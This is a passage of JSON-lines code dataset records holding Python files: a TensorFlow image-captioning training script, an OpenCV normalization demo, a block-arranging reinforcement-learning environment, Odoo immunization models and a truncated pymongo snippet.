1000000\n\nhps = get_default_params()\n\n\nclass Vocab(object):\n    '''\n    Builds the vocabulary.\n    '''\n    def __init__(self, filename, word_num_threshold):\n        self._id_to_word = {}  # mapping from word id to word\n        self._word_to_id = {}  # mapping from word to word id\n        self._unk = -1\n        self._eos = -1\n        self._word_num_threshold = word_num_threshold\n        self._read_dict(filename)  # read the vocab file into dict form\n\n    def _read_dict(self, filename):\n        '''\n        Reads the vocab file into dictionary form.\n        :param filename: the vocab file\n        :return:\n        '''\n        with gfile.GFile(filename, 'r') as f:\n            lines = f.readlines()\n            for line in lines:\n                # occurence is the word frequency\n                word, occurence = line.strip('\\r\\n').split('\\t')\n                occurence = int(occurence)\n                if word != '' and occurence < self._word_num_threshold:\n                    continue\n                # ids are assigned in insertion order\n                idx = len(self._id_to_word)\n                if word == '':\n                    self._unk = idx\n                elif word == '.':\n                    self._eos = idx\n                if idx in self._id_to_word or word in self._word_to_id:\n                    raise Exception('duplicate words in vocab file')\n                # build the two mappings\n                self._word_to_id[word] = idx\n                self._id_to_word[idx] = word\n\n    @property\n    def unk(self):\n        return self._unk\n\n    @property\n    def eos(self):\n        return self._eos\n\n    def word_to_id(self, word):\n        '''\n        Converts a single word to its id.\n        :param word: the word\n        :return: the word id\n        '''\n        return self._word_to_id.get(word, self.unk)\n\n    def id_to_word(self, cur_id):\n        '''\n        Converts a word id back to the word.\n        :param cur_id: the word id\n        :return: the word\n        '''\n        return self._id_to_word.get(cur_id, '')\n\n    def size(self):\n        # vocabulary size\n        return len(self._word_to_id)\n\n    def encode(self, sentence):\n        '''\n        Maps the words of a description to their ids.\n        :param sentence: the description sentence\n        :return: the sentence as word ids\n        '''\n        word_ids = [self.word_to_id(cur_word) for cur_word in sentence.split(' ')]\n        return word_ids\n\n    def decode(self, sentence_id):\n        '''\n        
Converts a sentence of ids back into words.\n        :param sentence_id: the sentence as word ids\n        :return: the sentence as words\n        '''\n        words = [self.id_to_word(word_id) for word_id in sentence_id]\n        return ' '.join(words)\n\n\ndef parse_token_file(token_file):\n    '''\n    Parses the token file.\n    :param token_file: the file path\n    :return: a dict shaped like: {'1234.jpg': ['this is a people', 'the people is happy']}\n    '''\n    img_name_to_tokens = {}\n    with gfile.GFile(token_file, 'r') as f:\n        lines = f.readlines()\n        for line in lines:\n            img_id, description = line.strip('\\r\\n').split('\\t')\n            img_name, _ = img_id.split('#')\n            img_name_to_tokens.setdefault(img_name, [])\n            img_name_to_tokens[img_name].append(description)\n    return img_name_to_tokens\n\n\ndef convert_token_to_id(img_name_to_tokens, vocab):\n    '''\n    Put simply: takes the result of the previous function and replaces the description text with its id representation.\n    :param img_name_to_tokens:\n    :param vocab: the vocabulary\n    :return: a dict shaped like: {'1234.jpg': ['4 556 44 6757', '2223 4354 22 1']}\n    '''\n    img_name_to_token_ids = {}\n    for img_name in img_name_to_tokens:\n        img_name_to_token_ids.setdefault(img_name, [])\n        descriptions = img_name_to_tokens[img_name]\n        for description in descriptions:\n            token_ids = vocab.encode(description)\n            img_name_to_token_ids[img_name].append(token_ids)\n    return img_name_to_token_ids\n\n\nvocab = Vocab(input_vocab_file, hps.num_vocab_word_threshold)\nvocab_size = vocab.size()  # vocabulary size\nlogging.info("vocab_size: %d" % vocab_size)\n\n\nimg_name_to_tokens = parse_token_file(input_description_file)\n# the descriptions for each image, as word ids\nimg_name_to_token_ids = convert_token_to_id(img_name_to_tokens, vocab)\n\n\nclass ImageCaptionData(object):\n    '''\n    Supplies the training data in batches.\n    '''\n    def __init__(self,\n                 img_name_to_token_ids,\n                 img_feature_dir,\n                 num_timesteps,\n                 vocab,\n                 deterministic=False):\n        '''\n\n        :param img_name_to_token_ids: dict from image name to descriptions\n        :param img_feature_dir: directory holding the image feature files\n        :param num_timesteps: number of timesteps\n        :param vocab: the vocabulary\n        :param deterministic: if True, do not shuffle\n        '''\n        self._vocab = vocab\n        self._all_img_feature_filepaths = []  # full paths of the image feature files\n        for filename in gfile.ListDirectory(img_feature_dir):\n            self._all_img_feature_filepaths.append(os.path.join(img_feature_dir, filename))\n\n        self._img_name_to_token_ids = img_name_to_token_ids\n        self._num_timesteps = num_timesteps\n        self._indicator = 0  # start index of the current batch\n        self._deterministic = deterministic\n        self._img_feature_filenames = []  # paths of all image features\n        self._img_feature_data = []  # all image features\n        self._load_img_feature_pickle()\n        if not self._deterministic:\n            self._random_shuffle()\n\n    def _load_img_feature_pickle(self):\n        '''\n        Reads the image features from the pickle files.\n        :return:\n        '''\n        for filepath in self._all_img_feature_filepaths:\n            with gfile.GFile(filepath, 'rb') as f:\n                filenames, features = pickle.load(f, encoding='iso-8859-1')\n                self._img_feature_filenames += filenames  # concatenate the filename lists\n                self._img_feature_data.append(features)  # collect the feature arrays\n        # e.g. two matrices of shape (1000, 1, 1, 2048) become (2000, 1, 1, 2048) after stacking\n        self._img_feature_data = np.vstack(self._img_feature_data)\n        origin_shape = self._img_feature_data.shape\n        # at this point origin_shape is (31783, 1, 1, 2048)\n        self._img_feature_data = np.reshape(  # drop the two singleton dimensions\n            self._img_feature_data, (origin_shape[0], origin_shape[3]))\n        self._img_feature_filenames = np.asarray(self._img_feature_filenames)\n        print(self._img_feature_data.shape)  # (31783, 2048)\n        print(self._img_feature_filenames.shape)  # (31783,)\n        if not self._deterministic:\n            self._random_shuffle()\n\n    def size(self):\n        # number of image files\n        return len(self._img_feature_filenames)\n\n    def img_feature_size(self):\n        # dimensionality of the image features\n        return self._img_feature_data.shape[1]\n\n    def _random_shuffle(self):\n        p = 
np.random.permutation(self.size())\n        self._img_feature_filenames = self._img_feature_filenames[p]\n        self._img_feature_data = self._img_feature_data[p]\n\n    def _img_desc(self, filenames):\n        '''\n        Randomly picks one description per image from its candidate sentences.\n        :param filenames:\n        :return:\n        '''\n        batch_sentence_ids = []\n        batch_weights = []  # prepared so useless gradients can be masked out later\n        for filename in filenames:\n            token_ids_set = self._img_name_to_token_ids[filename]\n            chosen_token_ids = random.choice(token_ids_set)  # pick one at random\n            #chosen_token_ids = token_ids_set[0]\n            chosen_token_length = len(chosen_token_ids)\n\n            weight = [1 for i in range(chosen_token_length)]\n            if chosen_token_length >= self._num_timesteps:\n                chosen_token_ids = chosen_token_ids[0:self._num_timesteps]\n                weight = weight[0:self._num_timesteps]\n            else:  # otherwise pad with zeros\n                # number of padding tokens needed\n                remaining_length = self._num_timesteps - chosen_token_length\n                chosen_token_ids += [self._vocab.eos for i in range(remaining_length)]\n                weight += [0 for i in range(remaining_length)]\n            batch_sentence_ids.append(chosen_token_ids)\n            batch_weights.append(weight)\n        batch_sentence_ids = np.asarray(batch_sentence_ids)\n        batch_weights = np.asarray(batch_weights)\n        # returns the batch of sentence descriptions together with their weights\n        return batch_sentence_ids, batch_weights\n\n    def next(self, batch_size):\n        '''\n        Returns batch_size samples.\n        The flow is:\n        1. get the image names\n        2. get the image features\n        3. get the image descriptions\n        :param batch_size:\n        :return:\n        '''\n        end_indicator = self._indicator + batch_size\n        if end_indicator > self.size():\n            if not self._deterministic:\n                self._random_shuffle()\n            self._indicator = 0\n            end_indicator = self._indicator + batch_size\n        assert end_indicator <= self.size()\n\n        batch_img_features = self._img_feature_data[self._indicator: end_indicator]\n        batch_img_names = self._img_feature_filenames[self._indicator: end_indicator]\n\n        # batch_sentence_ids holds the image descriptions in id form,\n        # batch_weights holds the sentence weights, sentence_ids:[100, 101, 102, 0, 0, 0]--->[1, 1, 1, 0, 0, 0]\n        # i.e. a mask multiplied with sentence_ids so the padded positions contribute nothing to the loss\n        batch_sentence_ids, batch_weights = self._img_desc(batch_img_names)\n\n        self._indicator = end_indicator\n        return batch_img_features, batch_sentence_ids, batch_weights, batch_img_names\n\n\ncaption_data = ImageCaptionData(img_name_to_token_ids, input_img_feature_dir, hps.num_timesteps, vocab)\nimg_feature_dim = caption_data.img_feature_size()\n\ndef create_rnn_cell(hidden_dim, cell_type):\n    '''\n    Returns the network cell matching the given cell type.\n    :param hidden_dim:\n    :param cell_type:\n    :return:\n    '''\n    if cell_type == 'lstm':\n        return tf.contrib.rnn.BasicLSTMCell(hidden_dim, state_is_tuple=True)\n    elif cell_type == 'gru':\n        return tf.contrib.rnn.GRUCell(hidden_dim)\n    else:\n        raise Exception("%s is not supported" % cell_type)\n\n\ndef dropout(cell, keep_prob):\n    return tf.contrib.rnn.DropoutWrapper(cell, output_keep_prob=keep_prob)\n\n\ndef get_train_model(hps, vocab_size, img_feature_dim):\n    num_timesteps = hps.num_timesteps\n    batch_size = hps.batch_size\n\n    img_feature = tf.placeholder(tf.float32, (batch_size, img_feature_dim))\n    sentence = tf.placeholder(tf.int32, (batch_size, num_timesteps))\n    mask = tf.placeholder(tf.float32, (batch_size, num_timesteps))\n    keep_prob = tf.placeholder(tf.float32, name='keep_prob')\n\n    global_step = tf.Variable(tf.zeros([], tf.int64), name='global_step', trainable=False)\n\n    '''\n    Training process:\n    sentence: [a, b, c, d, e, f]\n\n    actual input: [img, a, b, c, d, e]\n    image feature [0.3, 0.5, 0.2, 0.9]\n    predict #1 img_feature -> embedding_img -> (a)\n    predict #2 a -> embedding_word -> lstm -> b\n    predict #3 b -> -> c \n    '''\n    # Sets up the embedding layer.\n    embedding_initializer = 
tf.random_uniform_initializer(-1.0, 1.0)\n    # tf.random_uniform_initializer() creates an initializer that produces uniformly distributed tensors\n    # reference: https://www.w3cschool.cn/tensorflow_python/tensorflow_python-f1np2gyt.html\n    with tf.variable_scope('embedding', initializer=embedding_initializer):\n        embeddings = tf.get_variable(\n            'embeddings',\n            [vocab_size, hps.num_embedding_nodes],\n            tf.float32)\n        embed_token_ids = tf.nn.embedding_lookup(embeddings, sentence[:, 0:num_timesteps - 1])\n        # embed_token_ids now has shape [batch_size, num_timestep-1, num_embedding]\n\n    # Embed the image.\n    # The image is a 2048-dim vector here; a fully-connected layer turns it into a vector of the\n    # same length as a word embedding, so the image embedding and the word embeddings can be\n    # concatenated together for prediction.\n    img_feature_embed_init = tf.uniform_unit_scaling_initializer(factor=1.0)\n    # reference: https://www.w3cschool.cn/tensorflow_python/tensorflow_python-fy6t2o0o.html\n    with tf.variable_scope('image_feature_embed', initializer=img_feature_embed_init):\n        # img_feature: [batch_size, img_feature_dim]\n        # embed_img: [batch_size, num_embedding_nodes]\n        embed_img = tf.layers.dense(img_feature, hps.num_embedding_nodes)\n        embed_img = tf.expand_dims(embed_img, 1)\n        # embed_inputs now has shape [batch_size, num_timesteps, num_embedding_nodes]\n        embed_inputs = tf.concat([embed_img, embed_token_ids], axis=1)\n\n    # Sets up LSTM network.\n    scale = 1.0 / math.sqrt(hps.num_embedding_nodes + hps.num_lstm_nodes[-1]) / 3.0\n    lstm_init = tf.random_uniform_initializer(-scale, scale)\n    with tf.variable_scope('lstm_nn', initializer=lstm_init):\n        cells = []\n        for i in range(hps.num_lstm_layers):\n            cell = create_rnn_cell(hps.num_lstm_nodes[i], hps.cell_type)\n            cell = dropout(cell, keep_prob)\n            cells.append(cell)\n        cell = tf.contrib.rnn.MultiRNNCell(cells)\n\n        initial_state = cell.zero_state(hps.batch_size, tf.float32)\n        # rnn_outputs: [batch_size, num_timesteps, hps.num_lstm_node[-1]]\n        rnn_outputs, _ = tf.nn.dynamic_rnn(cell,\n                                           embed_inputs,\n                                           initial_state=initial_state)\n\n    # Sets up the fully-connected layer.\n    fc_init = tf.uniform_unit_scaling_initializer(factor=1.0)\n    with tf.variable_scope('fc', initializer=fc_init):\n        # rnn_outputs feeds a fully-connected layer, so reshape it: keep the last dimension and merge the first two\n        rnn_outputs_2d = tf.reshape(rnn_outputs, [-1, hps.num_lstm_nodes[-1]])\n        fc1 = tf.layers.dense(rnn_outputs_2d, hps.num_fc_nodes, name='fc1')\n        fc1_dropout = tf.nn.dropout(fc1, keep_prob)\n        fc1_dropout = tf.nn.relu(fc1_dropout)\n        logits = tf.layers.dense(fc1_dropout, vocab_size, name='logits')\n        # logits is a probability distribution over the whole vocabulary\n        # logits has shape (800, 10875): 800 is batch_size*timesteps, 10875 is the vocabulary size\n        # note that dropout in the fully-connected layer differs from dropout in the lstm,\n        # which uses tf.contrib.rnn.DropoutWrapper()\n\n\n    with tf.variable_scope('loss'):\n        # the first two dimensions were flattened before the fully-connected layer, so the ground truth must be flattened the same way\n        '''\n        Some extra notes here so this is not forgotten later.\n        Before the fully-connected layer the data was reshaped to 2-D, i.e.\n        [\n        [timestep 1 of 1.jpg, size of the last lstm layer],\n        [timestep 2 of 1.jpg, size of the last lstm layer],\n        ...\n        [timestep 1 of 2.jpg, size of the last lstm layer],\n        [timestep 2 of 2.jpg, size of the last lstm layer]\n        ]\n        so the final logits come out as\n        [the predicted distribution for timestep 1 of 1.jpg,\n        the predicted distribution for timestep 2 of 1.jpg,\n        ...\n        the predicted distribution for timestep 1 of 2.jpg,\n        ]\n        Likewise, reshaping sentences gives\n        [\n        timestep 1 gt of 1.jpg\n        timestep 2 gt of 1.jpg\n        ...\n        timestep 1 gt of 2.jpg\n        timestep 2 gt of 2.jpg\n        ]\n        so the predictions and the ground truth line up exactly.\n        '''\n        sentence_flatten = tf.reshape(sentence, [-1])\n        mask_flatten = tf.reshape(mask, [-1])\n        mask_sum = tf.reduce_sum(mask_flatten)\n        softmax_loss = tf.nn.sparse_softmax_cross_entropy_with_logits(\n            logits=logits, labels=sentence_flatten)\n        weighted_softmax_loss = tf.multiply(softmax_loss,\n                                            tf.cast(mask_flatten, tf.float32))\n        # this function does three things: 1. applies softmax to the logits; 2. one-hot encodes the labels; 
3. computes the cross entropy\n\n        prediction = tf.argmax(logits, 1)  # the predicted token ids\n        # compare the predictions against the ground truth\n        correct_prediction = tf.equal(tf.cast(prediction,tf.int32), sentence_flatten)\n        # apply the mask to drop the noise from padded positions\n        correct_prediction_with_mask = tf.multiply(\n            tf.cast(correct_prediction, tf.float32),\n            mask_flatten)\n        accuracy = tf.reduce_sum(correct_prediction_with_mask) / mask_sum\n        loss = tf.reduce_sum(weighted_softmax_loss) / mask_sum\n        tf.summary.scalar('loss', loss)\n\n    with tf.variable_scope('train_op'):\n        tvars = tf.trainable_variables()\n        for var in tvars:\n            logging.info("variable name: %s" % (var.name))\n        grads, _ = tf.clip_by_global_norm(  # clip the gradients\n            tf.gradients(loss, tvars), hps.clip_lstm_grads)\n        for grad, var in zip(grads, tvars):\n            tf.summary.histogram('%s_grad' % (var.name), grad)\n        optimizer = tf.train.AdamOptimizer(hps.learning_rate)\n        train_op = optimizer.apply_gradients(zip(grads, tvars), global_step=global_step)\n\n    return ((img_feature, sentence, mask, keep_prob),\n            (loss, accuracy, train_op),\n            global_step)\n\n\nplaceholders, metrics, global_step = get_train_model(hps, vocab_size, img_feature_dim)\nimg_feature, sentence, mask, keep_prob = placeholders\nloss, accuracy, train_op = metrics\n\nsummary_op = tf.summary.merge_all()\n\ninit_op = tf.global_variables_initializer()\nsaver = tf.train.Saver(max_to_keep=10)\n\nwith tf.Session() as sess:\n    sess.run(init_op)\n    writer = tf.summary.FileWriter(output_dir, sess.graph)\n    for i in range(training_steps):\n        batch_img_features, batch_sentence_ids, batch_weights, _ = caption_data.next(hps.batch_size)\n        input_vals = (batch_img_features, batch_sentence_ids, batch_weights, hps.keep_prob)\n\n        feed_dict = dict(zip(placeholders, input_vals))\n        fetches = [global_step, loss, accuracy, train_op]\n\n        should_log = (i + 1) % hps.log_frequent == 0\n        should_save = (i + 1) % hps.save_frequent == 0\n        if should_log:\n            fetches += [summary_op]\n        outputs = sess.run(fetches, feed_dict)\n        global_step_val, loss_val, accuracy_val = outputs[0:3]\n        if should_log:\n            summary_str = outputs[4]\n            writer.add_summary(summary_str, global_step_val)\n            logging.info('Step: %5d, loss: %3.3f, accuracy: %3.3f'\n                         % (global_step_val, loss_val, accuracy_val))\n        if should_save:\n            logging.info("Step: %d, image caption model saved" % (global_step_val))\n            saver.save(sess, os.path.join(output_dir, "image_caption"), global_step=global_step_val)","sub_path":"image_caption_train.py","file_name":"image_caption_train.py","file_ext":"py","file_size_in_byte":20012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"478801701","text":"# coding: utf-8\nfrom cv2 import cv2\nimport numpy as np\n\nimg = cv2.imread(r"pictures\\lena.jpg")\ncv2.namedWindow("input", cv2.WINDOW_AUTOSIZE)\ncv2.imshow("input", img)\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\ngray = np.float32(gray)\nprint(gray)\n\n# scale and shift by NORM_MINMAX\ndst = np.zeros(gray.shape, dtype=np.float32)\ncv2.normalize(gray, dst=dst, alpha=0, beta=1.0, norm_type=cv2.NORM_MINMAX)\nprint(dst)\ncv2.imshow("NORM_MINMAX", np.uint8(dst*255))\n\n# scale and shift by NORM_INF\ndst = np.zeros(gray.shape, dtype=np.float32)\ncv2.normalize(gray, dst=dst, alpha=1.0, beta=0, norm_type=cv2.NORM_INF)\nprint(dst)\ncv2.imshow("NORM_INF", np.uint8(dst*255))\n\n# scale and shift by NORM_L1\ndst = np.zeros(gray.shape, dtype=np.float32)\ncv2.normalize(gray, dst=dst, alpha=1.0, beta=0, norm_type=cv2.NORM_L1)\nprint(dst)\ncv2.imshow("NORM_L1", np.uint8(dst*10000000))\n\n# scale and shift by NORM_L2\ndst = 
np.zeros(gray.shape, dtype=np.float32)\ncv2.normalize(gray, dst=dst, alpha=1.0, beta=0, norm_type=cv2.NORM_L2)\nprint(dst)\ncv2.imshow(\"NORM_L2\", np.uint8(dst*10000))\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()","sub_path":"2.3-normalization.py","file_name":"2.3-normalization.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"581257757","text":"#\n# Derived from blockarrange2_rewardonsuccess_standalone.py\n#\n# Two blocks. Reward when they are placed horizontally adjacent.\n#\nimport math\nimport numpy as np\nimport gym\nfrom gym import error, spaces, utils\n#from gym.utils import seeding\n\nclass BlockArrange:\n\n def __init__(self):\n \n# self.maxSide = 3\n# self.maxSide = 4\n self.maxSide = 5\n# self.maxSide = 6\n# self.maxSide = 7\n self.num_blocks = 2\n self.num_moves = self.maxSide**2\n \n # 0 -- self.maxSide**2 -> pick from specified location\n # self.maxSide**2 + 1 -- 2*self.maxSide**2 -> place at specified location\n self.action_space = spaces.Discrete(2*self.maxSide**2)\n\n # Observations:\n # 0: block layout\n # 1: holding (0 (nothing), or block num)\n# self.observation_space = spaces.Tuple([spaces.Box(np.zeros([self.maxSide,self.maxSide,1]), self.num_blocks*np.ones([self.maxSide,self.maxSide,1])), spaces.Discrete(self.num_blocks)])\n self.observation_space = spaces.Tuple([spaces.Box(np.zeros([self.maxSide,self.maxSide,1]), np.ones([self.maxSide,self.maxSide,1])), spaces.Discrete(2)])\n \n self.state = None\n self.max_episode = 10\n \n self.reset()\n\n\n def reset(self):\n\n shape = self.observation_space.spaces[0].shape\n\n # Initialize state as null\n self.state = []\n \n # self.state[0] encodes block layout\n self.state.append(np.zeros(self.observation_space.spaces[0].shape))\n for i in range(self.num_blocks):\n while True:\n ii = np.random.randint(shape[0])\n jj = np.random.randint(shape[1])\n if self.state[0][ii,jj] == 0:\n# self.state[0][ii,jj] = i+1.\n self.state[0][ii,jj] = 1\n break\n\n # self.state[1] encodes what the robot is holding -- start out holding nothing (0)\n self.state.append(0)\n self.episode_timer = 0\n \n return np.array(self.state)\n \n \n def step(self, action):\n \n# posBlocks = -np.ones([self.num_blocks,2])\n \n holdingOld = np.copy(self.state[1])\n \n X,Y = np.meshgrid(range(self.maxSide),range(self.maxSide))\n coords = np.stack([np.reshape(Y,[self.maxSide**2,]), np.reshape(X,[self.maxSide**2,])],axis=0)\n\n # if PICK\n if action < self.num_moves:\n \n # if not holding anything\n if self.state[1] == 0:\n \n # set holding to contents of action target\n self.state[1] = np.int32(np.copy(np.squeeze(self.state[0][coords[0,action],coords[1,action]])))\n \n # zero out action target on grid\n self.state[0][coords[0,action],coords[1,action]] = 0\n \n # if PLACE\n elif action < 2*self.num_moves:\n \n action -= self.num_moves\n \n # if holding something and spot is free, then place\n if (self.state[1] != 0) and (self.state[0][coords[0,action],coords[1,action]] == 0):\n\n # place item\n self.state[0][coords[0,action],coords[1,action]] = self.state[1]\n \n # set holding to zero\n self.state[1] = 0\n \n else:\n print(\"error\")\n\n # check for termination condition\n reward = 0\n done = 0\n \n# # reward for successful pick\n# if (holdingOld == 0) and (self.state[1] == 1):\n# done = 1\n# reward = 10\n \n # reward for two blocks horizontal adjacency\n blockCoords = np.nonzero(self.state[0][:,:,0])\n if np.sum(self.state[0]) == 2: # if two blocks on the board\n if 
blockCoords[0][0] == blockCoords[0][1]: # if two blocks at same level\n if np.abs(blockCoords[1][0] - blockCoords[1][1]) <= 1: # if two blocks horizontally adjacent\n done = 1\n reward = 10\n \n# # three-block adjacency condition\n# if max(posBlocks[:,0]) - min(posBlocks[:,0]) == 0:\n# if max(posBlocks[:,1]) - min(posBlocks[:,1]) <= 2:\n# done = 1\n# reward = 10\n \n if self.episode_timer > self.max_episode:\n self.episode_timer = 0\n done = 1\n self.episode_timer += 1\n \n return self.state, reward, done, {} \n\n \n def render(self):\n \n print(\"grid:\")\n print(str(self.state[0][:,:,0]))\n print(\"holding: \" + str(self.state[1]))\n\n \n","sub_path":"envs/blockarrange_2blocks_baseline.py","file_name":"blockarrange_2blocks_baseline.py","file_ext":"py","file_size_in_byte":4660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"587777903","text":"# -*- coding: utf-8 -*-\n\nfrom openerp import models, fields, api\n\nclass Immunization(models.Model): \n _name = \"hc.res.immunization\" \n _description = \"Immunization\" \n\n identifier_ids = fields.One2many(\n comodel_name=\"hc.immunization.identifier\", \n inverse_name=\"immunization_id\", \n string=\"Identifiers\", \n help=\"Business identifier.\") \n status = fields.Selection(\n string=\"Status\", \n required=\"True\", \n selection=[\n (\"in-progress\", \"In-Progress\"), \n (\"on-hold\", \"On-Hold\"), \n (\"completed\", \"Completed\"), \n (\"entered-in-error\", \"Entered-In-Error\"), \n (\"stopped\", \"Stopped\")], \n help=\"The status of the diagnostic report as a whole.\") \n date = fields.Datetime(\n string=\"Date\", \n required=\"True\", \n help=\"Vaccination administration date.\") \n vaccine_code_id = fields.Many2one(\n comodel_name=\"hc.vs.vaccine.code\", \n string=\"Vaccine Code\", \n required=\"True\", \n help=\"Vaccine product administered.\") \n patient_id = fields.Many2one(\n comodel_name=\"hc.res.patient\", \n string=\"Patient\", \n required=\"True\", \n help=\"Who was immunized\") \n is_was_not_given = fields.Boolean(\n string=\"Was Not Given\", \n required=\"True\", \n help=\"Flag for whether immunization was given\") \n is_reported = fields.Boolean(\n string=\"Reported\", \n required=\"True\", \n help=\"Indicates a self-reported record\") \n performer_id = fields.Many2one(\n comodel_name=\"hc.res.practitioner\", \n string=\"Performer\", \n help=\"Who administered vaccine\") \n requester_id = fields.Many2one(\n comodel_name=\"hc.res.practitioner\", \n string=\"Requester\", \n help=\"Who ordered vaccination\") \n encounter_id = fields.Many2one(\n comodel_name=\"hc.res.encounter\", \n string=\"Encounter\", \n help=\"Encounter administered as part of.\") \n manufacturer_id = fields.Many2one(\n comodel_name=\"hc.res.organization\", \n string=\"Manufacturer\", \n help=\"Vaccine manufacturer.\") \n location_id = fields.Many2one(\n comodel_name=\"hc.res.location\", \n string=\"Location\", \n help=\"Where vaccination occurred\") \n lot_number = fields.Char(\n string=\"Lot Number\", \n help=\"Vaccine lot number.\") \n expiration_date = fields.Date(\n string=\"Expiration Date\", \n help=\"Vaccine expiration date.\") \n site_id = fields.Many2one(\n comodel_name=\"hc.vs.immunization.site\", \n string=\"Site\", \n help=\"Body site vaccine was administered.\") \n route_id = fields.Many2one(\n comodel_name=\"hc.vs.immunization.route\", \n string=\"Route\", \n help=\"How vaccine entered body.\") \n dose_quantity = fields.Float(\n string=\"Dose Quantity\", \n help=\"Amount of vaccine 
administered.\") \n note_ids = fields.One2many(\n comodel_name=\"hc.immunization.note\", \n inverse_name=\"immunization_id\", \n string=\"Notes\", \n help=\"Vaccination notes.\") \n explanation_id = fields.Many2one(\n comodel_name=\"hc.immunization.explanation\", \n string=\"Explanation\", \n help=\"Administration / non-administration reasons.\") \n reaction_ids = fields.One2many(\n comodel_name=\"hc.immunization.reaction\", \n inverse_name=\"immunization_id\", \n string=\"Reactions\", \n help=\"Details of a reaction that follows immunization.\") \n vaccination_protocol_ids = fields.One2many(\n comodel_name=\"hc.immunization.vaccination.protocol\", \n inverse_name=\"immunization_id\", \n string=\"Vaccination Protocols\", \n help=\"What protocol was followed.\") \n\nclass ImmunizationExplanation(models.Model): \n _name = \"hc.immunization.explanation\" \n _description = \"Immunization Explanation\" \n\n immunization_id = fields.Many2one(\n comodel_name=\"hc.res.immunization\", \n string=\"Immunization\", \n help=\"Immunization associated with this Immunization Explanation.\") \n reason_ids = fields.Many2many(\n comodel_name=\"hc.vs.immunization.reason\", \n relation=\"immunization_explanation_reason_rel\", \n string=\"Reasons\", \n help=\"Why immunization occurred.\")\n reason_not_given_ids = fields.Many2many(\n comodel_name=\"hc.vs.no.immunization.reason\", \n relation=\"immunization_explanation_reason_not_given_rel\", \n string=\"Reasons Not Given\", \n help=\"Why immunization did not occur.\") \n\nclass ImmunizationReaction(models.Model): \n _name = \"hc.immunization.reaction\" \n _description = \"Immunization Reaction\" \n\n immunization_id = fields.Many2one(\n comodel_name=\"hc.res.immunization\", \n string=\"Immunization\", \n help=\"Immunization associated with this Immunization Reaction.\") \n date = fields.Datetime(\n string=\"Date\", \n help=\"When reaction started\") \n detail_id = fields.Many2one(\n comodel_name=\"hc.res.observation\", \n string=\"Detail\", \n help=\"Additional information on reaction.\") \n is_reported = fields.Boolean(\n string=\"Reported\", \n help=\"Indicates self-reported reaction\") \n\nclass ImmunizationVaccinationProtocol(models.Model): \n _name = \"hc.immunization.vaccination.protocol\" \n _description = \"Immunization Vaccination Protocol\" \n\n immunization_id = fields.Many2one(\n comodel_name=\"hc.res.immunization\", \n string=\"Immunization\", \n help=\"Immunization associated with this Immunization Vaccination Protocol.\") \n dose_sequence = fields.Integer(\n string=\"Dose Sequence\", \n help=\"Dose number within series\") \n description = fields.Text(\n string=\"Description\", \n help=\"Details of vaccine protocol.\") \n authority_id = fields.Many2one(\n comodel_name=\"hc.res.organization\", \n string=\"Authority\", \n help=\"Who is responsible for protocol.\") \n series = fields.Char(\n string=\"Series\", \n help=\"Name of vaccine series.\") \n series_doses = fields.Integer(\n string=\"Series Doses\", \n help=\"Recommended number of doses for immunity.\") \n target_disease_ids = fields.Many2many(\n comodel_name=\"hc.vs.vaccination.protocol.dose.target\", \n relation=\"immunization_vaccination_protocol_target_disease_rel\", \n string=\"Target Diseases\", \n required=\"True\", \n help=\"Disease immunized against.\") \n dose_status_id = fields.Many2one(\n comodel_name=\"hc.vs.vaccination.protocol.dose.status\", \n string=\"Dose Status\", \n required=\"True\", \n help=\"Indicates if dose counts towards immunity\") \n dose_status_reason_id = 
fields.Many2one(\n comodel_name=\"hc.vs.vaccination.protocol.dose.status.reason\", \n string=\"Dose Status Reason\", help=\"Why dose does (not) count\") \n\nclass ImmunizationIdentifier(models.Model): \n _name = \"hc.immunization.identifier\" \n _description = \"Immunization Identifier\" \n _inherit = [\"hc.basic.association\", \"hc.identifier\"]\n\n immunization_id = fields.Many2one(\n comodel_name=\"hc.res.immunization\", \n string=\"Immunization\", \n help=\"Immunization associated with this Immunization Identifier.\") \n\nclass ImmunizationNote(models.Model): \n _name = \"hc.immunization.note\" \n _description = \"Immunization Note\" \n _inherit = [\"hc.basic.association\", \"hc.annotation\"]\n\n immunization_id = fields.Many2one(\n comodel_name=\"hc.res.immunization\", \n string=\"Immunization\", \n help=\"Immunization associated with this Immunization Note.\") \n\nclass ImmunizationRoute(models.Model): \n _name = \"hc.vs.immunization.route\" \n _description = \"Immunization Route\" \n _inherit = [\"hc.value.set.contains\"]\n\nclass ImmunizationSite(models.Model): \n _name = \"hc.vs.immunization.site\" \n _description = \"Immunization Site\" \n _inherit = [\"hc.value.set.contains\"]\n\nclass VaccinationProtocolDoseStatus(models.Model): \n _name = \"hc.vs.vaccination.protocol.dose.status\" \n _description = \"Vaccination Protocol Dose Status\" \n _inherit = [\"hc.value.set.contains\"]\n\nclass VaccinationProtocolDoseStatusReason(models.Model): \n _name = \"hc.vs.vaccination.protocol.dose.status.reason\" \n _description = \"Vaccination Protocol Dose Status Reason\" \n _inherit = [\"hc.value.set.contains\"]\n\nclass VaccineCode(models.Model): \n _name = \"hc.vs.vaccine.code\" \n _description = \"Vaccine Code\" \n _inherit = [\"hc.value.set.contains\"]\n\nclass VaccinationProtocolDoseTarget(models.Model): \n _name = \"hc.vs.vaccination.protocol.dose.target\" \n _description = \"Vaccination Protocol Dose Target\" \n _inherit = [\"hc.value.set.contains\"]\n\nclass ImmunizationReason(models.Model): \n _name = \"hc.vs.immunization.reason\" \n _description = \"Immunization Reason\" \n _inherit = [\"hc.value.set.contains\"]\n\nclass NoImmunizationReason(models.Model): \n _name = \"hc.vs.no.immunization.reason\" \n _description = \"No Immunization Reason\" \n _inherit = [\"hc.value.set.contains\"]\n\n","sub_path":"addons/hc_immunization/models/hc_res_immunization.py","file_name":"hc_res_immunization.py","file_ext":"py","file_size_in_byte":9824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"596348463","text":"from pymongo import MongoClient\nimport datetime\nimport pprint\n\n\nclient = MongoClient('localhost', 27017)\ndb = client.test_database\n\nposts = db.posts\nprint(db);\n\n\npost = {\"author\": \"Mike\",\n \"text\": \"My first blog 